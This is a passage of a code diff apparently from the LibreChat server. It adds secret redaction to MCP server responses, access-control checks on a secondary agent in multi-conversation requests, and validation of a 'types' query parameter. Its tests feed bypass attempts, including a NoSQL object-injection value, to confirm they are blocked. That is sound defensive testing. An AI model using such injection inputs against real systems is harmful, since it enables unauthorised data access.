Agent.create({ + id: `agent_${nanoid()}`, + author: mockReq.user.id, + name: 'Owned Agent', + provider: 'openai', + model: 'gpt-4', + tools: [], + }); + + const permMap = new Map([[ownedAgent._id.toString(), PermissionBits.VIEW]]); + getResourcePermissionsMap.mockResolvedValueOnce(permMap); + + mockReq.params = { id: ownedAgent.id }; + mockReq.body = { + edges: [{ from: ownedAgent.id, to: targetAgent.id, edgeType: 'handoff' }], + }; + + await updateAgentHandler(mockReq, mockRes); + + expect(mockRes.status).toHaveBeenCalledWith(403); + const response = mockRes.json.mock.calls[0][0]; + expect(response.agent_ids).toContain(targetAgent.id); + expect(response.agent_ids).not.toContain(ownedAgent.id); + }); + + test('updateAgentHandler should succeed when edges field is absent from payload', async () => { + const ownedAgent = await Agent.create({ + id: `agent_${nanoid()}`, + author: mockReq.user.id, + name: 'Owned Agent', + provider: 'openai', + model: 'gpt-4', + tools: [], + }); + + mockReq.params = { id: ownedAgent.id }; + mockReq.body = { name: 'Renamed Agent' }; + + await updateAgentHandler(mockReq, mockRes); + + expect(mockRes.status).not.toHaveBeenCalledWith(403); + const response = mockRes.json.mock.calls[0][0]; + expect(response.name).toBe('Renamed Agent'); + }); + }); }); diff --git a/api/server/controllers/mcp.js b/api/server/controllers/mcp.js index e5dfff61ca..729f01da9d 100644 --- a/api/server/controllers/mcp.js +++ b/api/server/controllers/mcp.js @@ -7,9 +7,11 @@ */ const { logger } = require('@librechat/data-schemas'); const { + MCPErrorCodes, + redactServerSecrets, + redactAllServerSecrets, isMCPDomainNotAllowedError, isMCPInspectionFailedError, - MCPErrorCodes, } = require('@librechat/api'); const { Constants, MCPServerUserInputSchema } = require('librechat-data-provider'); const { cacheMCPServerTools, getMCPServerTools } = require('~/server/services/Config'); @@ -181,10 +183,8 @@ const getMCPServersList = async (req, res) => { return res.status(401).json({ message: 'Unauthorized' }); } - // 2. Get all server configs from registry (YAML + DB) const serverConfigs = await getMCPServersRegistry().getAllServerConfigs(userId); - - return res.json(serverConfigs); + return res.json(redactAllServerSecrets(serverConfigs)); } catch (error) { logger.error('[getMCPServersList]', error); res.status(500).json({ error: error.message }); @@ -215,7 +215,7 @@ const createMCPServerController = async (req, res) => { ); res.status(201).json({ serverName: result.serverName, - ...result.config, + ...redactServerSecrets(result.config), }); } catch (error) { logger.error('[createMCPServer]', error); @@ -243,7 +243,7 @@ const getMCPServerById = async (req, res) => { return res.status(404).json({ message: 'MCP server not found' }); } - res.status(200).json(parsedConfig); + res.status(200).json(redactServerSecrets(parsedConfig)); } catch (error) { logger.error('[getMCPServerById]', error); res.status(500).json({ message: error.message }); @@ -274,7 +274,7 @@ const updateMCPServerController = async (req, res) => { userId, ); - res.status(200).json(parsedConfig); + res.status(200).json(redactServerSecrets(parsedConfig)); } catch (error) { logger.error('[updateMCPServer]', error); const mcpErrorResponse = handleMCPError(error, res); diff --git a/api/server/middleware/accessResources/canAccessAgentFromBody.js b/api/server/middleware/accessResources/canAccessAgentFromBody.js index f8112af14d..572a86f5e5 100644 --- a/api/server/middleware/accessResources/canAccessAgentFromBody.js +++ b/api/server/middleware/accessResources/canAccessAgentFromBody.js @@ -1,42 +1,144 @@ const { logger } = require('@librechat/data-schemas'); const { Constants, + Permissions, ResourceType, + SystemRoles, + PermissionTypes, isAgentsEndpoint, isEphemeralAgentId, } = require('librechat-data-provider'); +const { checkPermission } = require('~/server/services/PermissionService'); const { canAccessResource } = require('./canAccessResource'); +const { getRoleByName } = require('~/models/Role'); const { getAgent } = require('~/models/Agent'); /** - * Agent ID resolver function for agent_id from request body - * Resolves custom agent ID (e.g., "agent_abc123") to MongoDB ObjectId - * This is used specifically for chat routes where agent_id comes from request body - * + * Resolves custom agent ID (e.g., "agent_abc123") to a MongoDB document. * @param {string} agentCustomId - Custom agent ID from request body - * @returns {Promise} Agent document with _id field, or null if not found + * @returns {Promise} Agent document with _id field, or null if ephemeral/not found */ const resolveAgentIdFromBody = async (agentCustomId) => { - // Handle ephemeral agents - they don't need permission checks - // Real agent IDs always start with "agent_", so anything else is ephemeral if (isEphemeralAgentId(agentCustomId)) { - return null; // No permission check needed for ephemeral agents + return null; } - - return await getAgent({ id: agentCustomId }); + return getAgent({ id: agentCustomId }); }; /** - * Middleware factory that creates middleware to check agent access permissions from request body. - * This middleware is specifically designed for chat routes where the agent_id comes from req.body - * instead of route parameters. + * Creates a `canAccessResource` middleware for the given agent ID + * and chains to the provided continuation on success. + * + * @param {string} agentId - The agent's custom string ID (e.g., "agent_abc123") + * @param {number} requiredPermission - Permission bit(s) required + * @param {import('express').Request} req + * @param {import('express').Response} res - Written on deny; continuation called on allow + * @param {Function} continuation - Called when the permission check passes + * @returns {Promise} + */ +const checkAgentResourceAccess = (agentId, requiredPermission, req, res, continuation) => { + const middleware = canAccessResource({ + resourceType: ResourceType.AGENT, + requiredPermission, + resourceIdParam: 'agent_id', + idResolver: () => resolveAgentIdFromBody(agentId), + }); + + const tempReq = { + ...req, + params: { ...req.params, agent_id: agentId }, + }; + + return middleware(tempReq, res, continuation); +}; + +/** + * Middleware factory that validates MULTI_CONVO:USE role permission and, when + * addedConvo.agent_id is a non-ephemeral agent, the same resource-level permission + * required for the primary agent (`requiredPermission`). Caches the resolved agent + * document on `req.resolvedAddedAgent` to avoid a duplicate DB fetch in `loadAddedAgent`. + * + * @param {number} requiredPermission - Permission bit(s) to check on the added agent resource + * @returns {(req: import('express').Request, res: import('express').Response, next: Function) => Promise} + */ +const checkAddedConvoAccess = (requiredPermission) => async (req, res, next) => { + const addedConvo = req.body?.addedConvo; + if (!addedConvo || typeof addedConvo !== 'object' || Array.isArray(addedConvo)) { + return next(); + } + + try { + if (!req.user?.role) { + return res.status(403).json({ + error: 'Forbidden', + message: 'Insufficient permissions for multi-conversation', + }); + } + + if (req.user.role !== SystemRoles.ADMIN) { + const role = await getRoleByName(req.user.role); + const hasMultiConvo = role?.permissions?.[PermissionTypes.MULTI_CONVO]?.[Permissions.USE]; + if (!hasMultiConvo) { + return res.status(403).json({ + error: 'Forbidden', + message: 'Multi-conversation feature is not enabled', + }); + } + } + + const addedAgentId = addedConvo.agent_id; + if (!addedAgentId || typeof addedAgentId !== 'string' || isEphemeralAgentId(addedAgentId)) { + return next(); + } + + if (req.user.role === SystemRoles.ADMIN) { + return next(); + } + + const agent = await resolveAgentIdFromBody(addedAgentId); + if (!agent) { + return res.status(404).json({ + error: 'Not Found', + message: `${ResourceType.AGENT} not found`, + }); + } + + const hasPermission = await checkPermission({ + userId: req.user.id, + role: req.user.role, + resourceType: ResourceType.AGENT, + resourceId: agent._id, + requiredPermission, + }); + + if (!hasPermission) { + return res.status(403).json({ + error: 'Forbidden', + message: `Insufficient permissions to access this ${ResourceType.AGENT}`, + }); + } + + req.resolvedAddedAgent = agent; + return next(); + } catch (error) { + logger.error('Failed to validate addedConvo access permissions', error); + return res.status(500).json({ + error: 'Internal Server Error', + message: 'Failed to validate addedConvo access permissions', + }); + } +}; + +/** + * Middleware factory that checks agent access permissions from request body. + * Validates both the primary agent_id and, when present, addedConvo.agent_id + * (which also requires MULTI_CONVO:USE role permission). * * @param {Object} options - Configuration options * @param {number} options.requiredPermission - The permission bit required (1=view, 2=edit, 4=delete, 8=share) * @returns {Function} Express middleware function * * @example - * // Basic usage for agent chat (requires VIEW permission) * router.post('/chat', * canAccessAgentFromBody({ requiredPermission: PermissionBits.VIEW }), * buildEndpointOption, @@ -46,11 +148,12 @@ const resolveAgentIdFromBody = async (agentCustomId) => { const canAccessAgentFromBody = (options) => { const { requiredPermission } = options; - // Validate required options if (!requiredPermission || typeof requiredPermission !== 'number') { throw new Error('canAccessAgentFromBody: requiredPermission is required and must be a number'); } + const addedConvoMiddleware = checkAddedConvoAccess(requiredPermission); + return async (req, res, next) => { try { const { endpoint, agent_id } = req.body; @@ -67,28 +170,13 @@ const canAccessAgentFromBody = (options) => { }); } - // Skip permission checks for ephemeral agents - // Real agent IDs always start with "agent_", so anything else is ephemeral + const afterPrimaryCheck = () => addedConvoMiddleware(req, res, next); + if (isEphemeralAgentId(agentId)) { - return next(); + return afterPrimaryCheck(); } - const agentAccessMiddleware = canAccessResource({ - resourceType: ResourceType.AGENT, - requiredPermission, - resourceIdParam: 'agent_id', // This will be ignored since we use custom resolver - idResolver: () => resolveAgentIdFromBody(agentId), - }); - - const tempReq = { - ...req, - params: { - ...req.params, - agent_id: agentId, - }, - }; - - return agentAccessMiddleware(tempReq, res, next); + return checkAgentResourceAccess(agentId, requiredPermission, req, res, afterPrimaryCheck); } catch (error) { logger.error('Failed to validate agent access permissions', error); return res.status(500).json({ diff --git a/api/server/middleware/accessResources/canAccessAgentFromBody.spec.js b/api/server/middleware/accessResources/canAccessAgentFromBody.spec.js new file mode 100644 index 0000000000..47f1130d13 --- /dev/null +++ b/api/server/middleware/accessResources/canAccessAgentFromBody.spec.js @@ -0,0 +1,509 @@ +const mongoose = require('mongoose'); +const { + ResourceType, + SystemRoles, + PrincipalType, + PrincipalModel, +} = require('librechat-data-provider'); +const { MongoMemoryServer } = require('mongodb-memory-server'); +const { canAccessAgentFromBody } = require('./canAccessAgentFromBody'); +const { User, Role, AclEntry } = require('~/db/models'); +const { createAgent } = require('~/models/Agent'); + +describe('canAccessAgentFromBody middleware', () => { + let mongoServer; + let req, res, next; + let testUser, otherUser; + + beforeAll(async () => { + mongoServer = await MongoMemoryServer.create(); + await mongoose.connect(mongoServer.getUri()); + }); + + afterAll(async () => { + await mongoose.disconnect(); + await mongoServer.stop(); + }); + + beforeEach(async () => { + await mongoose.connection.dropDatabase(); + + await Role.create({ + name: 'test-role', + permissions: { + AGENTS: { USE: true, CREATE: true, SHARE: true }, + MULTI_CONVO: { USE: true }, + }, + }); + + await Role.create({ + name: 'no-multi-convo', + permissions: { + AGENTS: { USE: true, CREATE: true, SHARE: true }, + MULTI_CONVO: { USE: false }, + }, + }); + + await Role.create({ + name: SystemRoles.ADMIN, + permissions: { + AGENTS: { USE: true, CREATE: true, SHARE: true }, + MULTI_CONVO: { USE: true }, + }, + }); + + testUser = await User.create({ + email: 'test@example.com', + name: 'Test User', + username: 'testuser', + role: 'test-role', + }); + + otherUser = await User.create({ + email: 'other@example.com', + name: 'Other User', + username: 'otheruser', + role: 'test-role', + }); + + req = { + user: { id: testUser._id, role: testUser.role }, + params: {}, + body: { + endpoint: 'agents', + agent_id: 'ephemeral_primary', + }, + }; + res = { + status: jest.fn().mockReturnThis(), + json: jest.fn(), + }; + next = jest.fn(); + + jest.clearAllMocks(); + }); + + describe('middleware factory', () => { + test('throws if requiredPermission is missing', () => { + expect(() => canAccessAgentFromBody({})).toThrow( + 'canAccessAgentFromBody: requiredPermission is required and must be a number', + ); + }); + + test('throws if requiredPermission is not a number', () => { + expect(() => canAccessAgentFromBody({ requiredPermission: '1' })).toThrow( + 'canAccessAgentFromBody: requiredPermission is required and must be a number', + ); + }); + + test('returns a middleware function', () => { + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + expect(typeof middleware).toBe('function'); + expect(middleware.length).toBe(3); + }); + }); + + describe('primary agent checks', () => { + test('returns 400 when agent_id is missing on agents endpoint', async () => { + req.body.agent_id = undefined; + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await middleware(req, res, next); + + expect(next).not.toHaveBeenCalled(); + expect(res.status).toHaveBeenCalledWith(400); + }); + + test('proceeds for ephemeral primary agent without addedConvo', async () => { + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await middleware(req, res, next); + + expect(next).toHaveBeenCalled(); + expect(res.status).not.toHaveBeenCalled(); + }); + + test('proceeds for non-agents endpoint (ephemeral fallback)', async () => { + req.body.endpoint = 'openAI'; + req.body.agent_id = undefined; + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await middleware(req, res, next); + + expect(next).toHaveBeenCalled(); + }); + }); + + describe('addedConvo — absent or invalid shape', () => { + test('calls next when addedConvo is absent', async () => { + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await middleware(req, res, next); + + expect(next).toHaveBeenCalled(); + }); + + test('calls next when addedConvo is a string', async () => { + req.body.addedConvo = 'not-an-object'; + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await middleware(req, res, next); + + expect(next).toHaveBeenCalled(); + }); + + test('calls next when addedConvo is an array', async () => { + req.body.addedConvo = [{ agent_id: 'agent_something' }]; + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await middleware(req, res, next); + + expect(next).toHaveBeenCalled(); + }); + }); + + describe('addedConvo — MULTI_CONVO permission gate', () => { + test('returns 403 when user lacks MULTI_CONVO:USE', async () => { + req.user.role = 'no-multi-convo'; + req.body.addedConvo = { agent_id: 'agent_x', endpoint: 'agents', model: 'gpt-4' }; + + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await middleware(req, res, next); + + expect(next).not.toHaveBeenCalled(); + expect(res.status).toHaveBeenCalledWith(403); + expect(res.json).toHaveBeenCalledWith( + expect.objectContaining({ message: 'Multi-conversation feature is not enabled' }), + ); + }); + + test('returns 403 when user.role is missing', async () => { + req.user = { id: testUser._id }; + req.body.addedConvo = { agent_id: 'agent_x', endpoint: 'agents', model: 'gpt-4' }; + + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await middleware(req, res, next); + + expect(next).not.toHaveBeenCalled(); + expect(res.status).toHaveBeenCalledWith(403); + }); + + test('ADMIN bypasses MULTI_CONVO check', async () => { + req.user.role = SystemRoles.ADMIN; + req.body.addedConvo = { agent_id: 'ephemeral_x', endpoint: 'agents', model: 'gpt-4' }; + + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await middleware(req, res, next); + + expect(next).toHaveBeenCalled(); + expect(res.status).not.toHaveBeenCalled(); + }); + }); + + describe('addedConvo — agent_id shape validation', () => { + test('calls next when agent_id is ephemeral', async () => { + req.body.addedConvo = { agent_id: 'ephemeral_xyz', endpoint: 'agents', model: 'gpt-4' }; + + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await middleware(req, res, next); + + expect(next).toHaveBeenCalled(); + }); + + test('calls next when agent_id is absent', async () => { + req.body.addedConvo = { endpoint: 'agents', model: 'gpt-4' }; + + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await middleware(req, res, next); + + expect(next).toHaveBeenCalled(); + }); + + test('calls next when agent_id is not a string (object injection)', async () => { + req.body.addedConvo = { agent_id: { $gt: '' }, endpoint: 'agents', model: 'gpt-4' }; + + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await middleware(req, res, next); + + expect(next).toHaveBeenCalled(); + }); + }); + + describe('addedConvo — agent resource ACL (IDOR prevention)', () => { + let addedAgent; + + beforeEach(async () => { + addedAgent = await createAgent({ + id: `agent_added_${Date.now()}`, + name: 'Private Agent', + provider: 'openai', + model: 'gpt-4', + author: otherUser._id, + }); + + await AclEntry.create({ + principalType: PrincipalType.USER, + principalId: otherUser._id, + principalModel: PrincipalModel.USER, + resourceType: ResourceType.AGENT, + resourceId: addedAgent._id, + permBits: 15, + grantedBy: otherUser._id, + }); + }); + + test('returns 403 when requester has no ACL for the added agent', async () => { + req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' }; + + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await middleware(req, res, next); + + expect(next).not.toHaveBeenCalled(); + expect(res.status).toHaveBeenCalledWith(403); + expect(res.json).toHaveBeenCalledWith( + expect.objectContaining({ + message: 'Insufficient permissions to access this agent', + }), + ); + }); + + test('returns 404 when added agent does not exist', async () => { + req.body.addedConvo = { + agent_id: 'agent_nonexistent_999', + endpoint: 'agents', + model: 'gpt-4', + }; + + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await middleware(req, res, next); + + expect(next).not.toHaveBeenCalled(); + expect(res.status).toHaveBeenCalledWith(404); + }); + + test('proceeds when requester has ACL for the added agent', async () => { + await AclEntry.create({ + principalType: PrincipalType.USER, + principalId: testUser._id, + principalModel: PrincipalModel.USER, + resourceType: ResourceType.AGENT, + resourceId: addedAgent._id, + permBits: 1, + grantedBy: otherUser._id, + }); + + req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' }; + + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await middleware(req, res, next); + + expect(next).toHaveBeenCalled(); + expect(res.status).not.toHaveBeenCalled(); + }); + + test('denies when ACL permission bits are insufficient', async () => { + await AclEntry.create({ + principalType: PrincipalType.USER, + principalId: testUser._id, + principalModel: PrincipalModel.USER, + resourceType: ResourceType.AGENT, + resourceId: addedAgent._id, + permBits: 1, + grantedBy: otherUser._id, + }); + + req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' }; + + const middleware = canAccessAgentFromBody({ requiredPermission: 2 }); + await middleware(req, res, next); + + expect(next).not.toHaveBeenCalled(); + expect(res.status).toHaveBeenCalledWith(403); + }); + + test('caches resolved agent on req.resolvedAddedAgent', async () => { + await AclEntry.create({ + principalType: PrincipalType.USER, + principalId: testUser._id, + principalModel: PrincipalModel.USER, + resourceType: ResourceType.AGENT, + resourceId: addedAgent._id, + permBits: 1, + grantedBy: otherUser._id, + }); + + req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' }; + + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await middleware(req, res, next); + + expect(next).toHaveBeenCalled(); + expect(req.resolvedAddedAgent).toBeDefined(); + expect(req.resolvedAddedAgent._id.toString()).toBe(addedAgent._id.toString()); + }); + + test('ADMIN bypasses agent resource ACL for addedConvo', async () => { + req.user.role = SystemRoles.ADMIN; + req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' }; + + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await middleware(req, res, next); + + expect(next).toHaveBeenCalled(); + expect(res.status).not.toHaveBeenCalled(); + expect(req.resolvedAddedAgent).toBeUndefined(); + }); + }); + + describe('end-to-end: primary real agent + addedConvo real agent', () => { + let primaryAgent, addedAgent; + + beforeEach(async () => { + primaryAgent = await createAgent({ + id: `agent_primary_${Date.now()}`, + name: 'Primary Agent', + provider: 'openai', + model: 'gpt-4', + author: testUser._id, + }); + + await AclEntry.create({ + principalType: PrincipalType.USER, + principalId: testUser._id, + principalModel: PrincipalModel.USER, + resourceType: ResourceType.AGENT, + resourceId: primaryAgent._id, + permBits: 15, + grantedBy: testUser._id, + }); + + addedAgent = await createAgent({ + id: `agent_added_${Date.now()}`, + name: 'Added Agent', + provider: 'openai', + model: 'gpt-4', + author: otherUser._id, + }); + + await AclEntry.create({ + principalType: PrincipalType.USER, + principalId: otherUser._id, + principalModel: PrincipalModel.USER, + resourceType: ResourceType.AGENT, + resourceId: addedAgent._id, + permBits: 15, + grantedBy: otherUser._id, + }); + + req.body.agent_id = primaryAgent.id; + }); + + test('both checks pass when user has ACL for both agents', async () => { + await AclEntry.create({ + principalType: PrincipalType.USER, + principalId: testUser._id, + principalModel: PrincipalModel.USER, + resourceType: ResourceType.AGENT, + resourceId: addedAgent._id, + permBits: 1, + grantedBy: otherUser._id, + }); + + req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' }; + + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await middleware(req, res, next); + + expect(next).toHaveBeenCalled(); + expect(res.status).not.toHaveBeenCalled(); + expect(req.resolvedAddedAgent).toBeDefined(); + }); + + test('primary passes but addedConvo denied → 403', async () => { + req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' }; + + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await middleware(req, res, next); + + expect(next).not.toHaveBeenCalled(); + expect(res.status).toHaveBeenCalledWith(403); + }); + + test('primary denied → 403 without reaching addedConvo check', async () => { + const foreignAgent = await createAgent({ + id: `agent_foreign_${Date.now()}`, + name: 'Foreign Agent', + provider: 'openai', + model: 'gpt-4', + author: otherUser._id, + }); + + await AclEntry.create({ + principalType: PrincipalType.USER, + principalId: otherUser._id, + principalModel: PrincipalModel.USER, + resourceType: ResourceType.AGENT, + resourceId: foreignAgent._id, + permBits: 15, + grantedBy: otherUser._id, + }); + + req.body.agent_id = foreignAgent.id; + req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' }; + + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await middleware(req, res, next); + + expect(next).not.toHaveBeenCalled(); + expect(res.status).toHaveBeenCalledWith(403); + }); + }); + + describe('ephemeral primary + real addedConvo agent', () => { + let addedAgent; + + beforeEach(async () => { + addedAgent = await createAgent({ + id: `agent_added_${Date.now()}`, + name: 'Added Agent', + provider: 'openai', + model: 'gpt-4', + author: otherUser._id, + }); + + await AclEntry.create({ + principalType: PrincipalType.USER, + principalId: otherUser._id, + principalModel: PrincipalModel.USER, + resourceType: ResourceType.AGENT, + resourceId: addedAgent._id, + permBits: 15, + grantedBy: otherUser._id, + }); + }); + + test('runs full addedConvo ACL check even when primary is ephemeral', async () => { + req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' }; + + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await middleware(req, res, next); + + expect(next).not.toHaveBeenCalled(); + expect(res.status).toHaveBeenCalledWith(403); + }); + + test('proceeds when user has ACL for added agent (ephemeral primary)', async () => { + await AclEntry.create({ + principalType: PrincipalType.USER, + principalId: testUser._id, + principalModel: PrincipalModel.USER, + resourceType: ResourceType.AGENT, + resourceId: addedAgent._id, + permBits: 1, + grantedBy: otherUser._id, + }); + + req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' }; + + const middleware = canAccessAgentFromBody({ requiredPermission: 1 }); + await middleware(req, res, next); + + expect(next).toHaveBeenCalled(); + expect(res.status).not.toHaveBeenCalled(); + }); + }); +}); diff --git a/api/server/middleware/checkPeoplePickerAccess.js b/api/server/middleware/checkPeoplePickerAccess.js index 0e604272db..af2154dbba 100644 --- a/api/server/middleware/checkPeoplePickerAccess.js +++ b/api/server/middleware/checkPeoplePickerAccess.js @@ -2,13 +2,20 @@ const { logger } = require('@librechat/data-schemas'); const { PrincipalType, PermissionTypes, Permissions } = require('librechat-data-provider'); const { getRoleByName } = require('~/models/Role'); +const VALID_PRINCIPAL_TYPES = new Set([ + PrincipalType.USER, + PrincipalType.GROUP, + PrincipalType.ROLE, +]); + /** - * Middleware to check if user has permission to access people picker functionality - * Checks specific permission based on the 'type' query parameter: - * - type=user: requires VIEW_USERS permission - * - type=group: requires VIEW_GROUPS permission - * - type=role: requires VIEW_ROLES permission - * - no type (mixed search): requires either VIEW_USERS OR VIEW_GROUPS OR VIEW_ROLES + * Middleware to check if user has permission to access people picker functionality. + * Validates requested principal types via `type` (singular) and `types` (comma-separated or array) + * query parameters against the caller's role permissions: + * - user: requires VIEW_USERS permission + * - group: requires VIEW_GROUPS permission + * - role: requires VIEW_ROLES permission + * - no type filter (mixed search): requires at least one of the above */ const checkPeoplePickerAccess = async (req, res, next) => { try { @@ -28,7 +35,7 @@ const checkPeoplePickerAccess = async (req, res, next) => { }); } - const { type } = req.query; + const { type, types } = req.query; const peoplePickerPerms = role.permissions[PermissionTypes.PEOPLE_PICKER] || {}; const canViewUsers = peoplePickerPerms[Permissions.VIEW_USERS] === true; const canViewGroups = peoplePickerPerms[Permissions.VIEW_GROUPS] === true; @@ -49,15 +56,32 @@ const checkPeoplePickerAccess = async (req, res, next) => { }, }; - const check = permissionChecks[type]; - if (check && !check.hasPermission) { - return res.status(403).json({ - error: 'Forbidden', - message: check.message, - }); + const requestedTypes = new Set(); + + if (type && VALID_PRINCIPAL_TYPES.has(type)) { + requestedTypes.add(type); } - if (!type && !canViewUsers && !canViewGroups && !canViewRoles) { + if (types) { + const typesArray = Array.isArray(types) ? types : types.split(','); + for (const t of typesArray) { + if (VALID_PRINCIPAL_TYPES.has(t)) { + requestedTypes.add(t); + } + } + } + + for (const requested of requestedTypes) { + const check = permissionChecks[requested]; + if (!check.hasPermission) { + return res.status(403).json({ + error: 'Forbidden', + message: check.message, + }); + } + } + + if (requestedTypes.size === 0 && !canViewUsers && !canViewGroups && !canViewRoles) { return res.status(403).json({ error: 'Forbidden', message: 'Insufficient permissions to search for users, groups, or roles', @@ -67,7 +91,7 @@ const checkPeoplePickerAccess = async (req, res, next) => { next(); } catch (error) { logger.error( - `[checkPeoplePickerAccess][${req.user?.id}] checkPeoplePickerAccess error for req.query.type = ${req.query.type}`, + `[checkPeoplePickerAccess][${req.user?.id}] error for type=${req.query.type}, types=${req.query.types}`, error, ); return res.status(500).json({ diff --git a/api/server/middleware/checkPeoplePickerAccess.spec.js b/api/server/middleware/checkPeoplePickerAccess.spec.js index 52bf0e6724..9a229610de 100644 --- a/api/server/middleware/checkPeoplePickerAccess.spec.js +++ b/api/server/middleware/checkPeoplePickerAccess.spec.js @@ -173,6 +173,171 @@ describe('checkPeoplePickerAccess', () => { expect(next).not.toHaveBeenCalled(); }); + it('should deny access when using types param to bypass type-specific check', async () => { + req.query.types = PrincipalType.GROUP; + getRoleByName.mockResolvedValue({ + permissions: { + [PermissionTypes.PEOPLE_PICKER]: { + [Permissions.VIEW_USERS]: true, + [Permissions.VIEW_GROUPS]: false, + [Permissions.VIEW_ROLES]: false, + }, + }, + }); + + await checkPeoplePickerAccess(req, res, next); + + expect(res.status).toHaveBeenCalledWith(403); + expect(res.json).toHaveBeenCalledWith({ + error: 'Forbidden', + message: 'Insufficient permissions to search for groups', + }); + expect(next).not.toHaveBeenCalled(); + }); + + it('should deny access when types contains any unpermitted type', async () => { + req.query.types = `${PrincipalType.USER},${PrincipalType.ROLE}`; + getRoleByName.mockResolvedValue({ + permissions: { + [PermissionTypes.PEOPLE_PICKER]: { + [Permissions.VIEW_USERS]: true, + [Permissions.VIEW_GROUPS]: false, + [Permissions.VIEW_ROLES]: false, + }, + }, + }); + + await checkPeoplePickerAccess(req, res, next); + + expect(res.status).toHaveBeenCalledWith(403); + expect(res.json).toHaveBeenCalledWith({ + error: 'Forbidden', + message: 'Insufficient permissions to search for roles', + }); + expect(next).not.toHaveBeenCalled(); + }); + + it('should allow access when all requested types are permitted', async () => { + req.query.types = `${PrincipalType.USER},${PrincipalType.GROUP}`; + getRoleByName.mockResolvedValue({ + permissions: { + [PermissionTypes.PEOPLE_PICKER]: { + [Permissions.VIEW_USERS]: true, + [Permissions.VIEW_GROUPS]: true, + [Permissions.VIEW_ROLES]: false, + }, + }, + }); + + await checkPeoplePickerAccess(req, res, next); + + expect(next).toHaveBeenCalled(); + expect(res.status).not.toHaveBeenCalled(); + }); + + it('should validate types when provided as array (Express qs parsing)', async () => { + req.query.types = [PrincipalType.GROUP, PrincipalType.ROLE]; + getRoleByName.mockResolvedValue({ + permissions: { + [PermissionTypes.PEOPLE_PICKER]: { + [Permissions.VIEW_USERS]: true, + [Permissions.VIEW_GROUPS]: false, + [Permissions.VIEW_ROLES]: true, + }, + }, + }); + + await checkPeoplePickerAccess(req, res, next); + + expect(res.status).toHaveBeenCalledWith(403); + expect(res.json).toHaveBeenCalledWith({ + error: 'Forbidden', + message: 'Insufficient permissions to search for groups', + }); + expect(next).not.toHaveBeenCalled(); + }); + + it('should enforce permissions for combined type and types params', async () => { + req.query.type = PrincipalType.USER; + req.query.types = PrincipalType.GROUP; + getRoleByName.mockResolvedValue({ + permissions: { + [PermissionTypes.PEOPLE_PICKER]: { + [Permissions.VIEW_USERS]: true, + [Permissions.VIEW_GROUPS]: false, + [Permissions.VIEW_ROLES]: false, + }, + }, + }); + + await checkPeoplePickerAccess(req, res, next); + + expect(res.status).toHaveBeenCalledWith(403); + expect(res.json).toHaveBeenCalledWith({ + error: 'Forbidden', + message: 'Insufficient permissions to search for groups', + }); + expect(next).not.toHaveBeenCalled(); + }); + + it('should treat all-invalid types values as mixed search', async () => { + req.query.types = 'foobar'; + getRoleByName.mockResolvedValue({ + permissions: { + [PermissionTypes.PEOPLE_PICKER]: { + [Permissions.VIEW_USERS]: true, + [Permissions.VIEW_GROUPS]: false, + [Permissions.VIEW_ROLES]: false, + }, + }, + }); + + await checkPeoplePickerAccess(req, res, next); + + expect(next).toHaveBeenCalled(); + expect(res.status).not.toHaveBeenCalled(); + }); + + it('should deny when types is empty string and user has no permissions', async () => { + req.query.types = ''; + getRoleByName.mockResolvedValue({ + permissions: { + [PermissionTypes.PEOPLE_PICKER]: { + [Permissions.VIEW_USERS]: false, + [Permissions.VIEW_GROUPS]: false, + [Permissions.VIEW_ROLES]: false, + }, + }, + }); + + await checkPeoplePickerAccess(req, res, next); + + expect(res.status).toHaveBeenCalledWith(403); + expect(res.json).toHaveBeenCalledWith({ + error: 'Forbidden', + message: 'Insufficient permissions to search for users, groups, or roles', + }); + expect(next).not.toHaveBeenCalled(); + }); + + it('should treat types=public as mixed search since PUBLIC is not a searchable principal type', async () => { + req.query.types = PrincipalType.PUBLIC; + getRoleByName.mockResolvedValue({ + permissions: { + [PermissionTypes.PEOPLE_PICKER]: { + [Permissions.VIEW_USERS]: true, + [Permissions.VIEW_GROUPS]: false, + [Permissions.VIEW_ROLES]: false, + }, + }, + }); + + await checkPeoplePickerAccess(req, res, next); + + expect(next).toHaveBeenCalled(); + expect(res.status).not.toHaveBeenCalled(); + }); + it('should allow mixed search when user has at least one permission', async () => { // No type specified = mixed search req.query.type = undefined; @@ -222,7 +387,7 @@ describe('checkPeoplePickerAccess', () => { await checkPeoplePickerAccess(req, res, next); expect(logger.error).toHaveBeenCalledWith( - '[checkPeoplePickerAccess][user123] checkPeoplePickerAccess error for req.query.type = undefined', + '[checkPeoplePickerAccess][user123] error for 